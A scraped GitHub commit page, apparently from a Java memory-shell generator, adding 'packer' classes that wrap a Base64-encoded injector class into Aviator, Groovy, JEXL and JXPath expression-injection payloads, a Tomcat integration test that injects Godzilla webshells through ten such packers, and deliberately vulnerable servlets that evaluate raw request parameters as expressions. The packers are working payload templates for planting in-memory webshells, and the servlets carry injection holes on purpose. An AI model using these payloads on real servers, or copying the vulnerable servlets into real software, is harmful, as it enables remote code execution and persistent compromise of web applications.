-
Notifications
You must be signed in to change notification settings - Fork 55
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
feat: support more expression packer
- Loading branch information
Showing
19 changed files
with
400 additions
and
9 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
18 changes: 18 additions & 0 deletions
18
generator/src/main/java/com/reajason/javaweb/memshell/packer/aviator/AviatorPacker.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,18 @@ | ||
| package com.reajason.javaweb.memshell.packer.aviator; | ||
|
|
||
| import com.reajason.javaweb.memshell.config.GenerateResult; | ||
| import com.reajason.javaweb.memshell.packer.Packer; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/13 | ||
| */ | ||
| public class AviatorPacker implements Packer { | ||
| String template = "use org.springframework.cglib.core.*;use org.springframework.util.*;ReflectUtils.defineClass('{{className}}', Base64Utils.decodeFromString('{{base64Str}}'), ReflectionUtils.invokeMethod(ClassUtils.getMethod(Class.forName('java.lang.Thread'), 'getContextClassLoader', nil), Thread.currentThread()));"; | ||
|
|
||
| @Override | ||
| public String pack(GenerateResult generateResult) { | ||
| return template.replace("{{className}}", generateResult.getInjectorClassName()) | ||
| .replace("{{base64Str}}", generateResult.getInjectorBytesBase64Str()); | ||
| } | ||
| } |
19 changes: 19 additions & 0 deletions
19
generator/src/main/java/com/reajason/javaweb/memshell/packer/groovy/GroovyPacker.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| package com.reajason.javaweb.memshell.packer.groovy; | ||
|
|
||
| import com.reajason.javaweb.memshell.config.GenerateResult; | ||
| import com.reajason.javaweb.memshell.packer.Packer; | ||
| import com.reajason.javaweb.memshell.packer.Packers; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/13 | ||
| */ | ||
| public class GroovyPacker implements Packer { | ||
| String template = "new javax.script.ScriptEngineManager().getEngineByName('js').eval('{{script}}')"; | ||
|
|
||
| @Override | ||
| public String pack(GenerateResult generateResult) { | ||
| String script = Packers.ScriptEngine.getInstance().pack(generateResult); | ||
| return template.replace("{{script}}", script); | ||
| } | ||
| } |
19 changes: 19 additions & 0 deletions
19
generator/src/main/java/com/reajason/javaweb/memshell/packer/jexl/JEXLPacker.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| package com.reajason.javaweb.memshell.packer.jexl; | ||
|
|
||
| import com.reajason.javaweb.memshell.config.GenerateResult; | ||
| import com.reajason.javaweb.memshell.packer.Packer; | ||
| import com.reajason.javaweb.memshell.packer.Packers; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/13 | ||
| */ | ||
| public class JEXLPacker implements Packer { | ||
| String template = "''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('{{script}}')"; | ||
|
|
||
| @Override | ||
| public String pack(GenerateResult generateResult) { | ||
| String script = Packers.ScriptEngine.getInstance().pack(generateResult); | ||
| return template.replace("{{script}}", script); | ||
| } | ||
| } |
19 changes: 19 additions & 0 deletions
19
generator/src/main/java/com/reajason/javaweb/memshell/packer/jxpath/JXPathPacker.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| package com.reajason.javaweb.memshell.packer.jxpath; | ||
|
|
||
| import com.reajason.javaweb.memshell.config.GenerateResult; | ||
| import com.reajason.javaweb.memshell.packer.Packer; | ||
| import com.reajason.javaweb.memshell.packer.Packers; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/13 | ||
| */ | ||
| public class JXPathPacker implements Packer { | ||
| String template = "eval(getEngineByName(javax.script.ScriptEngineManager.new(), 'js'), '{{script}}')"; | ||
|
|
||
| @Override | ||
| public String pack(GenerateResult generateResult) { | ||
| String script = Packers.ScriptEngine.getInstance().pack(generateResult); | ||
| return template.replace("{{script}}", script); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
69 changes: 69 additions & 0 deletions
69
...src/test/java/com/reajason/javaweb/integration/tomcat/Tomcat8ExpressionContainerTest.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,69 @@ | ||
| package com.reajason.javaweb.integration.tomcat; | ||
|
|
||
| import com.reajason.javaweb.memshell.config.Constants; | ||
| import com.reajason.javaweb.memshell.config.Server; | ||
| import com.reajason.javaweb.memshell.config.ShellTool; | ||
| import com.reajason.javaweb.memshell.packer.Packers; | ||
| import lombok.extern.slf4j.Slf4j; | ||
| import net.bytebuddy.jar.asm.Opcodes; | ||
| import org.junit.jupiter.api.AfterAll; | ||
| import org.junit.jupiter.params.ParameterizedTest; | ||
| import org.junit.jupiter.params.provider.Arguments; | ||
| import org.junit.jupiter.params.provider.MethodSource; | ||
| import org.testcontainers.containers.GenericContainer; | ||
| import org.testcontainers.containers.wait.strategy.Wait; | ||
| import org.testcontainers.junit.jupiter.Container; | ||
| import org.testcontainers.junit.jupiter.Testcontainers; | ||
|
|
||
| import java.util.stream.Stream; | ||
|
|
||
| import static com.reajason.javaweb.integration.ContainerTool.*; | ||
| import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException; | ||
| import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk; | ||
| import static org.hamcrest.MatcherAssert.assertThat; | ||
| import static org.junit.jupiter.params.provider.Arguments.arguments; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/4 | ||
| */ | ||
| @Slf4j | ||
| @Testcontainers | ||
| public class Tomcat8ExpressionContainerTest { | ||
| public static final String imageName = "tomcat:8-jre8"; | ||
|
|
||
| @Container | ||
| public final static GenericContainer<?> container = new GenericContainer<>(imageName) | ||
| .withCopyToContainer(warExpressionFile, "/usr/local/tomcat/webapps/app.war") | ||
| .withCopyToContainer(jattachFile, "/jattach") | ||
| .withCopyToContainer(tomcatPid, "/fetch_pid.sh") | ||
| .waitingFor(Wait.forHttp("/app")) | ||
| .withExposedPorts(8080); | ||
|
|
||
| static Stream<Arguments> casesProvider() { | ||
| return Stream.of( | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.EL), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.OGNL), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.MVEL), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.SpEL), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.JEXL), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.JXPath), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.Aviator), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.Groovy), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.Freemarker), | ||
| arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packers.Velocity) | ||
| ); | ||
| } | ||
|
|
||
| @AfterAll | ||
| static void tearDown() { | ||
| String logs = container.getLogs(); | ||
| assertThat("Logs should not contain any exceptions", logs, doesNotContainException()); | ||
| } | ||
|
|
||
| @ParameterizedTest(name = "{0}-expression|{1}{2}|{3}") | ||
| @MethodSource("casesProvider") | ||
| void test(String imageName, String shellType, ShellTool shellTool, Packers packer) { | ||
| testShellInjectAssertOk(getUrl(container), Server.Tomcat, shellType, shellTool, Opcodes.V1_8, packer, container); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
22 changes: 22 additions & 0 deletions
22
vul/vul-webapp-expression/src/main/java/AviatorServlet.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,22 @@ | ||
| import com.googlecode.aviator.AviatorEvaluator; | ||
| import com.googlecode.aviator.AviatorEvaluatorInstance; | ||
| import groovy.lang.GroovyShell; | ||
|
|
||
| import javax.servlet.ServletException; | ||
| import javax.servlet.http.HttpServlet; | ||
| import javax.servlet.http.HttpServletRequest; | ||
| import javax.servlet.http.HttpServletResponse; | ||
| import java.io.IOException; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/14 | ||
| */ | ||
| public class AviatorServlet extends HttpServlet { | ||
| @Override | ||
| protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { | ||
| String data = req.getParameter("data"); | ||
| AviatorEvaluatorInstance evaluator = AviatorEvaluator.newInstance(); | ||
| resp.getWriter().println(evaluator.execute(data)); | ||
| } | ||
| } |
20 changes: 20 additions & 0 deletions
20
vul/vul-webapp-expression/src/main/java/GroovyServlet.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,20 @@ | ||
| import groovy.lang.GroovyShell; | ||
| import ognl.OgnlContext; | ||
|
|
||
| import javax.servlet.ServletException; | ||
| import javax.servlet.http.HttpServlet; | ||
| import javax.servlet.http.HttpServletRequest; | ||
| import javax.servlet.http.HttpServletResponse; | ||
| import java.io.IOException; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/14 | ||
| */ | ||
| public class GroovyServlet extends HttpServlet { | ||
| @Override | ||
| protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { | ||
| String data = req.getParameter("data"); | ||
| resp.getWriter().println(new GroovyShell().evaluate(data)); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,24 @@ | ||
| import org.apache.commons.jexl2.Expression; | ||
| import org.apache.commons.jexl2.JexlEngine; | ||
| import org.apache.commons.jexl2.MapContext; | ||
|
|
||
| import javax.servlet.ServletException; | ||
| import javax.servlet.http.HttpServlet; | ||
| import javax.servlet.http.HttpServletRequest; | ||
| import javax.servlet.http.HttpServletResponse; | ||
| import java.io.IOException; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/14 | ||
| */ | ||
| public class JEXL2Servlet extends HttpServlet { | ||
| @Override | ||
| protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { | ||
| String data = req.getParameter("data"); | ||
| JexlEngine jexl = new JexlEngine(); | ||
| Expression e = jexl.createExpression(data); | ||
| MapContext jc = new MapContext(); | ||
| resp.getWriter().println(e.evaluate(jc)); | ||
| } | ||
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
|
|
||
| import org.apache.commons.jexl3.JexlBuilder; | ||
| import org.apache.commons.jexl3.JexlEngine; | ||
| import org.apache.commons.jexl3.JexlExpression; | ||
| import org.apache.commons.jexl3.MapContext; | ||
|
|
||
| import javax.servlet.ServletException; | ||
| import javax.servlet.http.HttpServlet; | ||
| import javax.servlet.http.HttpServletRequest; | ||
| import javax.servlet.http.HttpServletResponse; | ||
| import java.io.IOException; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/14 | ||
| */ | ||
| public class JEXL3Servlet extends HttpServlet { | ||
| @Override | ||
| protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { | ||
| String data = req.getParameter("data"); | ||
| JexlEngine jexl = new JexlBuilder().create(); | ||
| JexlExpression e = jexl.createExpression(data); | ||
| MapContext jc = new MapContext(); | ||
| resp.getWriter().println(e.evaluate(jc)); | ||
| } | ||
| } |
21 changes: 21 additions & 0 deletions
21
vul/vul-webapp-expression/src/main/java/JXPathServlet.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| import groovy.lang.GroovyShell; | ||
| import org.apache.commons.jxpath.JXPathContext; | ||
|
|
||
| import javax.servlet.ServletException; | ||
| import javax.servlet.http.HttpServlet; | ||
| import javax.servlet.http.HttpServletRequest; | ||
| import javax.servlet.http.HttpServletResponse; | ||
| import java.io.IOException; | ||
|
|
||
| /** | ||
| * @author ReaJason | ||
| * @since 2024/12/14 | ||
| */ | ||
| public class JXPathServlet extends HttpServlet { | ||
| @Override | ||
| protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { | ||
| String data = req.getParameter("data"); | ||
| JXPathContext context = JXPathContext.newContext(null); | ||
| resp.getWriter().println(context.getValue(data )); | ||
| } | ||
| } |
Oops, something went wrong.